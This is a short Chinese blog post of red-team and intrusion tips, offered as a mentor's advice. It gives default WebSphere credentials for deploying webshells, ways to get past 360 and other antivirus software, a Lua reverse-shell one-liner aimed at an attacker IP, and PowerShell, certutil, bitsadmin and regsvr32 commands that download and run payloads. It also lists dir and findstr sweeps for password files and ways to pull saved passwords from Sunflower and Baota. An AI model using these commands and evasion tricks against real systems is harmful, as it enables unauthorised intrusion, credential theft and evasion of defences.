小tips

2021-03-10

字数统计: 1.2k字 | 阅读时长≈ 5分

从师傅那里听说的一些小tips，记一下

内网开这9443、9043、9080三个端口一般是websphere。在9043加 /ibm/console，
wasadmin wasadmin，可以部署webshell

1、哥斯拉自带的sweetpotato提权模块可以直接提权执行命令，无需上传文件，防止权限过低无法执行命令。
2、360会拦截sqlserver的xp_ cmdshell模块执行命令，可以通过clr执行命令绕过，在cIr的命令中直接写执行免杀exe的代码，可以直接上线。
3、360企业版会秒杀go写的工具，frp, nps等代理不可用，此时用cs的代理或者冰蝎的代理可以勉强使用，需要在内网中快速打下第二台出网机器建立代理。
4、遇到一层代理机器通另一个网段，但是有acI策略，只能通某一个端口，如web80端口，此时无法通过反向代理建立二层代理，考虑使用reg等http代理工具。
5、weblogic使用reg隧道工具会有bug,需要修改使用weblogic版本，但是此版本的sock通信有bug,无法连接sqlserver (可认证，但证书不能通过)
6、http代理走rdp协议流量太大，可能无法正常使用连接，可以考虑通过smb来建立ipc连接，写计划任务，或者将硬盘映射到跳板机来读取文件。
7、一个信息搜集的思路，通过fofa api提取所有靶标相关的关键字，将ur/ip提取，使用bscan快速扫描识别。可以再对ip权重做判断，提取重要c段放入goby进行扫描。
8、shiro高版本的加密方式不同，需要使用aesgcm的加密方式的利用工具。
9、某些杀软(说的就是火*)不拦guest用户启用，加入管理员组，通过3389远程桌面连接，然后手动给自己的工具加白(狗头
10、servers/ AdminServer/tmp/. WL. _internal/bea. _wls internal/9j4dqk/war/ weblogic10.3.6的上传路径，直接
通过rce.上传。

11、指定目录下搜集各类敏感文件

dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*.xml"
dir /a /s /b d:\"*.mdb"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.mdf"
dir /a /s /b d:\"*.eml"
dir /a /s /b d:\"*.pst"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"

12、指定目录下的文件中搜集各种账号密码

findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

13、kali带了psexec模块但是如果走reg隧道会无法建立ipc连接，用下面的exe扔到webshell里，使用atexec可以执行命令并且回显，适用于不出网的机器没开3389的时候来执行命令。

https://github.com/SecureAuthCorp/impacket

https://github.com/maaaaz/impacket-examples-windows

14、lua反弹shelllua -e "local socket=require('socket');local os=require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','端口');os.execute('/bin/bash -i <&3 >&3 2>&3');"，分享一个网站，各种各样的弹shell方法：Online - Reverse Shell Generator (revshells.com)，还有火狐插件HackTools

15、nmap批量探测存活nmap -sP -iL ip.txt -oG ip_output.txt

16、补天公益
必须是gov或者edu，如果不是的话必须百度权重大于等于1，谷歌权重大于等于3

17、weblogic获取async路径

http://x.x.x.x./_async/AsyncResponseService?info

18、windows远程下载

powershell -nop -w hidden -c "IEC((new-objectnet.webclient).downloadstring('http://x.x.x.x/p'))"
certutil -urlcache -split -f http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe
bitsadmin /trasnfer n http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&c:\\Windows\\Temp\\test.exe
regsvr32 /s /n /u /i:http://x.x.x.x/r scrobj.dll

19、权限不够的时候可以读向日葵配置文件读密码然后连接远程桌面，向日葵的配置文件权限是放开的，解密脚本：wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具 (github.com)

20、

21、bitadmin、certutil、IMEEDBLD都能用来在windows下下载文件

22、如果是宝塔搭建的windows网站，可以尝试读取宝塔后台的账户密码（一般明文存在txt中或md5加密后存在数据库中）

本文作者： Sn1pEr
本文链接： https://sn1per-ssd.github.io/2021/03/10/小tips/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！